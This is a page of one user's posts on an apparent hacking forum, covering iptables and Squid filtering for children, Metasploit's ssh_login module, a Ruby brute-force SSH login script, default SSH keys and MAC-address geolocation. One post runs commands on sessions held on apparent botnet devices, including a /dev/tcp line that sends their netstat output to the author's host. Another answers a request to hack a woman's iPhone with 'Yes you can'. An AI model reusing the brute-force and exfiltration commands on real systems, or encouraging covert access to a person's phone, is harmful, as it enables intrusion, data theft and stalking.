Posts posted by i8igmac
-
6 hours ago, PoSHMagiC0de said:
If you have a Raspberry Pi you could always use Pi-hole.
I do not know how advanced your router is, but if you can set up separate DNS options for reserved clients then you can set up their DNS to point to Pi-hole. Now you can blackhole any DNS requests to sites you do not want them having access to. I do not know if Pi-hole can MAC-filter requests, but I do know it can act as a DHCP server too. It will give you insight into all the queries they make too, in essence their sites. It pretty much blackholes any DNS requests for sites you do not want.
You could go with Squid, but you will need to tell the clients to use it via proxy settings. If you are really serious you could put a Snort/Suricata machine inline to do sniffing and filtering, which will force them through it. Adding a cert trusted by the clients will give you insight into their HTTPS request contents as well.
I'm not doubting the idea here, just pointing out the configuration I have explained with the use of a kid-safe wifi access point...
All devices associated will be affected by the iptables rules without the need to configure proxy settings on each machine or each application...
You can forward the traffic to pi-hole or squid... the access point running iptable rules is simply a control point...
full control of traffic is full control.
-
11 hours ago, G-Stress said:
Thanks for all the info and quick response guys. My babies are (about to be 8) this Wednesday and 9. They're good kids, I don't really worry about them getting curious, at least not yet, but I don't want any accidents either.
I remember hearing about Squid years ago, but I've never messed with it. We primarily use Chrome, but being that IE would still be an option, I want to really lock things down at the router/AP level. YouTube, I agree there are some things on there not suitable for young kids, but that's the one thing where I trust and allow them to watch appropriate content. So far I've been blessed; the biggest issue there is those compilation videos where some clips are fine then some have a lot of cussing, etc.
I ran DD-WRT for years, but never played with iptables. I guess now my concern is which would be more reliable/stable and do the best job? If Squid, then what would be the best preferred setup via OS to run it on, or in a VM? Also does iptables or Squid do any form of reporting via email or text in the event anyone on that network tried to search for say porn, or would I have to manually check logs? I will probably be using a Nighthawk router and soon a UniFi AP Pro access point for that network setup.
If the traffic is controlled at the router then it would take more skill to bypass this filtering...
open source router OS that includes iptables really can be powerful.
The simplest method might simply be to redirect all the kids traffic to your squid machine.
http://www.penguintutor.com/kidsafe.php
I like how the squid config looks at this last weblink...
If you get yourself a proper setup please share the configuration files.
Installing certificates on the kids devices also brings the ability to log the traffic.
# squid-box, local-network and iptables-box are placeholders for your own addresses;
# the negation goes before the option (! -s) on current iptables versions
iptables -t nat -A PREROUTING -i eth0 ! -s squid-box -p tcp --dport 80 -j DNAT --to squid-box:3128
iptables -t nat -A POSTROUTING -o eth0 -s local-network -d squid-box -j SNAT --to iptables-box
iptables -A FORWARD -s local-network -d squid-box -i eth0 -o eth0 -p tcp --dport 3128 -j ACCEPT
-
Get a cheap router from Goodwill. Make sure you check the model number before purchase for DD-WRT compatibility... If it has wireless N or 5.8 GHz speeds then that's a SCORE...
flash with new open source firmware, configure the device as a kids wifi repeater...
Now you can setup custom iptable rules. I'm sure there are already documented iptable configs online for kid safe surfing...
-
34 minutes ago, digip said:
Um. Open a command prompt. Go to the place where "MyStuff" was (the parent directory), and do the following:
dir /ahs
Now, CD into the listed hidden directory. Now do dir again (or add the /ahs if all files are set to the same attributes and hidden).
This does nothing other than change the file's attributes, to hidden and system, which can still be seen and accessed. Basically:
ren "poop" "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
dir /ahs
attrib -h -s "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}" "poop"
dir
That is not entirely true, there are a few if expressions followed by a proper Echo.
-
Post your command that generates the payload... confirm you used the correct IP address and port...
What operating system is your machine running the payload?
Here is a test you can do to check port 4444 is open... launch the exploit multi handler, then from your victim machine or any other machine do a port scan...
nmap -p 4444 192.168.1.7
-
Is this connection inside the same network?
-
3 hours ago, digip said:
I just got one of those blocks, when pasting links from twitter. No code, just linking and quote from a tweet was enough to trigger it.
here is the post -
It can be extremely frustrating when you spend 30 minutes writing content then it's all lost once you click submit.
It can be difficult to copy/paste information and organize it from my Android; I do most of everything from my phone. It happened again last night from my laptop. Extremely frustrating...
I think it can be triggered when you don't use (code) tags or (quote) tags.
The captcha seems to be effective enough. Disable the filter. I doubt code injection will be successful from posting content...
May sound ironic, but if anything this content filtering has made hak5 more vulnerable.
This could be the downfall of hak5. Fresh content is important. This has prevented me from posting content several times.
-
My struggle is getting my hands on the response data to check if 'Please login' exists.
If there are any metasploit gurus around here I could use some help... I can get close but only when I dig deep into the libs...
-
I hope to place an if expression before SUCCESS happens.
if response.data.include?("Please login:")
  # then submit the current CREDS
  scanner.ssh_socket.send_data(creds.user + "\n")
  scanner.ssh_socket.send_data(creds.pass + "\n")
end
Here is the modules/auxiliary/scanner/ssh/ssh_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'
require 'metasploit/framework/login_scanner/ssh'
require 'metasploit/framework/credential_collection'

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::CommandShell
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'SSH Login Check Scanner',
      'Description' => %q{
        This module will test ssh logins on a range of machines and
        report successful logins. If you have loaded a database plugin
        and connected to a database this module will record successful
        logins and hosts so you can track your access.
      },
      'Author'      => ['todb'],
      'References'  => [
        [ 'CVE', '1999-0502'] # Weak password
      ],
      'License'     => MSF_LICENSE,
      'DefaultOptions' => {'VERBOSE' => false} # Disable annoying connect errors
    )

    register_options(
      [
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        Opt::Proxies,
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  def rport
    datastore['RPORT']
  end

  def session_setup(result, ssh_socket)
    return unless ssh_socket

    # Create a new session
    conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)

    merge_me = {
      'USERPASS_FILE'  => nil,
      'USER_FILE'      => nil,
      'PASS_FILE'      => nil,
      'USERNAME'       => result.credential.public,
      'PASSWORD'       => result.credential.private
    }
    info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})"
    s = start_session(self, info, merge_me, false, conn.lsock)
    self.sockets.delete(ssh_socket.transport.socket)

    # Set the session platform
    case result.proof
    when /Linux/
      s.platform = "linux"
    when /Darwin/
      s.platform = "osx"
    when /SunOS/
      s.platform = "solaris"
    when /BSD/
      s.platform = "bsd"
    when /HP-UX/
      s.platform = "hpux"
    when /AIX/
      s.platform = "aix"
    when /Win32|Windows/
      s.platform = "windows"
    when /Unknown command or computer name/
      s.platform = "cisco-ios"
    end

    s
  end

  def run_host(ip)
    @ip = ip
    cred_collection = Metasploit::Framework::CredentialCollection.new(
      blank_passwords: datastore['BLANK_PASSWORDS'],
      pass_file: datastore['PASS_FILE'],
      password: datastore['PASSWORD'],
      user_file: datastore['USER_FILE'],
      userpass_file: datastore['USERPASS_FILE'],
      username: datastore['USERNAME'],
      user_as_pass: datastore['USER_AS_PASS'],
    )

    cred_collection = prepend_db_passwords(cred_collection)

    scanner = Metasploit::Framework::LoginScanner::SSH.new(
      host: ip,
      port: rport,
      cred_details: cred_collection,
      proxies: datastore['Proxies'],
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      connection_timeout: datastore['SSH_TIMEOUT'],
      framework: framework,
      framework_module: self,
    )

    scanner.verbosity = :debug if datastore['SSH_DEBUG']

    scanner.scan! do |result|
      credential_data = result.to_h
      credential_data.merge!(
        module_fullname: self.fullname,
        workspace_id: myworkspace_id
      )
      case result.status
      when Metasploit::Model::Login::Status::SUCCESSFUL
        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
        credential_core = create_credential(credential_data)
        credential_data[:core] = credential_core
        create_credential_login(credential_data)
        session_setup(result, scanner.ssh_socket)
        :next_user
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
        vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}"
        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
        invalidate_login(credential_data)
        :abort
      when Metasploit::Model::Login::Status::INCORRECT
        vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
        invalidate_login(credential_data)
        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
      else
        invalidate_login(credential_data)
        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
      end
    end
  end
end
-
Here is an example of logging into a keyboard-interactive login shell.rb
This is the start of a brute-force keyboard-interactive SSH login.
require 'rubygems'
require 'net/ssh'

# 73.9.26.15
host = ARGV[0]
user = ARGV[1]
pass = ARGV[2]
result = ''
host_execution = false

Net::SSH.start(host, user, :password => pass) do |ssh|
  # Open a channel
  channel = ssh.open_channel do |channel, success|
    channel.request_pty
    channel.exec("help")
    channel.on_data do |channel, data|
      print data
      sleep 3
      # Send the password
      if data.include?("login:")
        channel.send_data "#{user}\n"
        # print("#{user}")
      end
      if data.include?("password :")
        channel.send_data("#{pass}\n")
        print("#{pass}")
      end
      if host_execution == false
        if data.include?('rkscli:')
          host_execution = true
          puts channel.send_data("help\n")
          channel.wait
        end
      end
      if host_execution == true
        if data.include?('rkscli:')
          # puts channel.send_data(gets)
          channel.wait
        end
      end
    end
  end
  # Wait for opened channel
  channel.wait
end
-
What ports are used? When a target machine runs the trojan, does it connect back to your machine? If so then you would have configured port forwarding? What port is this?
You should monitor this port; it's possible random traffic hit your open port, but it's also possible your tool is a backdoor. hackforum is full of bs tools.
I may have misunderstood what you see. A VNC session? Maybe someone ran your trojan from a VM.
-
26 minutes ago, Sebkinne said:
So our Cloudflare setup blocked your request because it detected a RCE attack. No idea why that would trigger from some links in the post, but I would suggest you try posting them again.
This is the 3rd time. Previous attempts to post content included some ruby code.
Edit: Strange, it works this time. I'll take screenshots next time this happens.
;.,/'[]{8\=-~=~ `ls` system("uname") }
-
I'm looking to automate the login process on my router running dropbear. This SSH service is configured in a way that would handle SSH logins with keyboard-interactive authentication.
If you are unsure what this is, you can test against your local machine:
ssh -o PreferredAuthentications=none -v 192.168.0.1
Authentications that can continue: publickey,password
Typically you would see (publickey,password)
In my situation this information is not displayed and I'm forced to log in with an interactive session.
When you enter an interactive session you would see the below... notice how the user has already been determined by the command used, but the session asks for the username:
ssh admin@192.168.69.1
welcome to Ruckus running dropbear
Please login: admin
Password:******
I hope to use ruby net/ssh or even metasploit to log in. So far all my tests to automate the login process have failed... there is some documentation on ruby net/ssh and keyboard-interactive sessions, but I can't find any examples online.
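The flow described above, as an added example (not i8igmac's script and not part of net/ssh): a prompt-driven responder for a device whose shell asks "Please login:" and "Password:" after the SSH channel is already open. The prompt strings are taken from the transcript in the post, 'rkscli:' is assumed to be the post-login shell prompt, and the FakeChannel stand-in is constructed so the flow can be exercised without a device.

```ruby
# Added example, not i8igmac's script: a prompt-driven responder for a device
# whose shell asks "Please login:" and "Password:" after the SSH channel is
# already open (the Ruckus/dropbear transcript above). Prompt strings are from
# that transcript; 'rkscli:' is assumed to be the post-login shell prompt.
class PromptResponder
  LOGIN_PROMPT    = "Please login:"
  PASSWORD_PROMPT = "Password:"
  SHELL_PROMPT    = "rkscli:"
  attr_reader :state
  def initialize(user, pass, command)
    @user, @pass, @command = user, pass, command
    @buffer = String.new   # kept so a prompt split across two chunks still matches
    @state  = :expect_login   # -> :expect_password -> :expect_shell -> :done
  end

  # Feed one chunk of channel output; returns the string to send, or nil.
  def feed(data)
    @buffer += data
    case @state
    when :expect_login    then reply_if(LOGIN_PROMPT,    :expect_password, "#{@user}\n")
    when :expect_password then reply_if(PASSWORD_PROMPT, :expect_shell,    "#{@pass}\n")
    when :expect_shell    then reply_if(SHELL_PROMPT,    :done,            "#{@command}\n")
    end
  end

  private
  # Advance only once the whole prompt has arrived; drop what was consumed.
  def reply_if(prompt, next_state, reply)
    return nil unless @buffer.include?(prompt)
    @buffer = String.new
    @state  = next_state
    reply
  end
end

# Hooks the responder onto anything with on_data/send_data, e.g. a Net::SSH
# channel after ch.request_pty / ch.exec("help") inside Net::SSH.start.
def drive(channel, responder)
  channel.on_data do |_ch, data|
    reply = responder.feed(data)
    channel.send_data(reply) if reply
  end
end

# Constructed offline stand-in for the channel, so the flow runs without a device.
class FakeChannel
  attr_reader :sent
  def initialize;      @sent = [];                     end
  def on_data(&blk);   @handler = blk;                 end
  def send_data(s);    @sent << s;                     end
  def receive(output); @handler.call(self, output);    end
end

def demo
  ch = FakeChannel.new
  drive(ch, PromptResponder.new("admin", "secret", "help"))
  ["welcome to Ruckus running dropbear\nPlease lo", "gin: ",
   "admin\nPassword:", "\nrkscli: "].each { |chunk| ch.receive(chunk) }
  ch.sent
end
```

The split "Please lo" / "gin: " chunks in demo show why the buffer matters: matching on each on_data chunk alone, as the script above does, misses a prompt that arrives in two pieces.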
-
4 hours ago, Sebkinne said:
?
When I post a new thread, I'm redirected to an error with the string above saying there is a security problem, and if this problem was a false report, to send the string to the network admin.
The last attempt to create a new thread only had a few links to metasploit on GitHub.
-
3c0783109a6379bb
I can't post content here.
-
3 hours ago, PoSHMagiC0de said:
Yelp, new installations of distros from iso generates new keys. If it is an img that is just copied to device like pi or phone the keys will be whatever they are in that image unless ssh is not installed in which case when it ssh server is installed it will generate new keys.
What about IoT devices? Routers, network storage, ARM devices. It's possible these kinds of devices were flashed with duplicate SSH keys.
Edit:
Or if a bunch of identical devices were flashed with the same OS, could the MAC address be incorporated in generating the new SSH key, or something predictable?
-
4 hours ago, PoSHMagiC0de said:
That pertains to prebuilt images for non PC devices. Nethunter and Kali for Raspberry PI or other Arm devices comes as a preinstalled OS image, same goes for the virtual images. Those will have default keys and you can get them from the images when downloaded. Anyone that used the ISO to install will have new keys because the package is installed at that moment hence it generates the keys right there.
So. I guess I misunderstood...
During installation, a new key is generated?
The same goes for routers and other little nas devices?
-
I'm looking for a collection of keys I could play around with. Does anyone know of a list of default keys for download? Does such a thing exist?
This metasploit module will attempt to log into a host with a set KEY => kali./ssh/ssh_key
Just an example: anyone who installs kali could be vulnerable to this type of attack, the key is the same on all kali machines, and after kali is installed it is recommended this ssh_key be replaced.
So is there a list of common default SSH keys anyone has seen for download?
-
1 hour ago, halfikr said:
I am so curious about someone. I want to know her more. Can I hack her iPhone with a wifi connection? Or something else I can do? Please help me.
Yes you can.
But before we talk about hacking, first watch 50 shades of grey. you must also watch a documentary on Gary Ridgway.
-
On 10/27/2017 at 9:02 AM, kdodge said:
on some *nix you can run netstat with the -p option to get the Process that is creating the connection. That might get you the backdoor that he is using.
netstat -ntp
Yeah, it's a randomly generated application name.
217.23.5.33:443 ESTABLISHED agy46jk87
-
I found the CnC... all of these devices are connected to the same identical IP...
It's a VPN service... so I guess all that is left to do is contact the VPN service and submit the logs...
turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done
First I started a listener that greps for a specific IP...
Then I sent 2 commands off to all current sessions:
msf auxiliary(ssh_login) > sessions all -c 'netstat -nt > net'
msf auxiliary(ssh_login) > sessions all -c 'cat < net > /dev/tcp/turdsplash.ip/8888'
Then the results pour into my netcat listener:
turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done
tcp 0 0 192.168.1.130:42074 217.23.5.33:443 ESTABLISHED
tcp 0 0 192.168.1.130:44592 217.23.5.33:443 CLOSE_WAIT
tcp 0 0 192.168.10.101:40764 217.23.5.33:443 ESTABLISHED
tcp 0 0 192.168.10.102:47652 217.23.5.33:443 CLOSE_WAIT
tcp 0 0 192.168.1.4:55475 217.23.5.33:443 ESTABLISHED
tcp 0 0 192.168.1.4:39033 217.23.5.33:443 CLOSE_WAIT
tcp 0 0 192.168.1.103:47597 217.23.5.33:443 ESTABLISHED
tcp 0 0 192.168.1.103:56610 217.23.5.33:443 CLOSE_WAIT
I could turn this into a metasploit module or resource script.
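The collection step above, as an added example (not i8igmac's code): parse the netstat -nt lines gathered from each session and report, per host, the state of its connections to the suspected C2 address. The sample lines are constructed in the same shape as the listener output in the post, with the address quoted there.

```ruby
# Added example, not i8igmac's code: parse the 'netstat -nt' lines gathered
# from each session above and report, per host, the state of its connections
# to the suspected C2 address (the one quoted in the post). The sample lines
# are constructed; both raw netstat spacing and the grep-collapsed form match.
NETSTAT_LINE = /\A\s*tcp6?\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)/

Conn = Struct.new(:local_ip, :local_port, :remote_ip, :remote_port, :state)

# Header and non-tcp lines are skipped; ports are split off the addresses.
def parse_netstat(text)
  text.each_line.filter_map do |line|
    m = NETSTAT_LINE.match(line) or next
    Conn.new(m[1], m[2].to_i, m[3], m[4].to_i, m[5])
  end
end

# { local_ip => { state => count } } for connections to c2_ip on any port.
def hosts_talking_to(conns, c2_ip)
  conns.select { |c| c.remote_ip == c2_ip }
       .group_by(&:local_ip)
       .transform_values { |cs| cs.map(&:state).tally }
end

# Constructed sample: one raw netstat dump plus one grep-collapsed line.
SAMPLE = <<~NETSTAT
  Active Internet connections (w/o servers)
  Proto Recv-Q Send-Q Local Address           Foreign Address         State
  tcp        0      0 192.168.1.130:42074     217.23.5.33:443         ESTABLISHED
  tcp        0      0 192.168.1.130:44592     217.23.5.33:443         CLOSE_WAIT
  tcp        0      0 192.168.1.4:22          192.168.1.50:51234      ESTABLISHED
  tcp 0 0 192.168.10.101:40764 217.23.5.33:443 ESTABLISHED
NETSTAT

def report(c2_ip = "217.23.5.33")
  hosts_talking_to(parse_netstat(SAMPLE), c2_ip)
end
```

Feeding the real listener output instead of SAMPLE gives the per-host summary to hand to the VPN provider along with the raw lines.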
-
On 8/5/2017 at 7:03 AM, Spoonish said:
♪♫♪Roy is here to save the day!♪♫
You could help in providing mind bottling theories to solving this question... how do you get shells...
The honeypot was fun, but here were the next steps I took in exploring this botnet that is attacking my Super-L33t-wifi-router.
There have been questions around here about setting up metasploit modules and configuring your exploits to set your reverse meterpreter with a public IP... I have answered in this video.
If any one wants a demonstration on the steps I took in setting up the honey pot and ip tables used to redirect and monitor traffic. I could make a video.
-
17 minutes ago, Just_a_User said:
Wasn't that something Samy Kamkar did, but Google borked it? He says it's still possible for the motivated reader.
"I then take the MAC address and send it along to Google Location Services. This is an HTTP-based service where router MAC addresses are mapped to approximate GPS "
This looks interesting. I was thinking client MAC addresses is what I may be looking for.
-
Google used to drive around and log mac addresses of access points and log gps location until this raised privacy concerns.
So what they did after this was used smart phones to collect this data in the same manner but with the proper terms and conditions accepted by the user.
One of my habits is watching traffic on my network. I have seen my old Samsung S5 sending MAC addresses with GPS x,y locations in plain text. This was a running service that sparked my interest.
This information can be used to locate a laptop, tablet, cell phone or anything with a MAC address.
If millions of smartphone users have been collecting this data and building Google's database, it should be no problem to search for a MAC address and retrieve a GPS location.
Here is an example of a MAC address and GPS logger/tracker. https://cellphonetrackers.org/gsm/wifi-tracker.php
Here is a Google API https://developers.google.com/maps/documentation/geolocation/intro
Anyone know if Google has given public access to this database?
Which Language?
in Applications & Coding
Maybe 6 years ago I chose ruby. I was interested in writing metasploit modules.
Python has fewer limitations. I wouldn't bother with C++ until you have a year's worth of python or ruby figured out.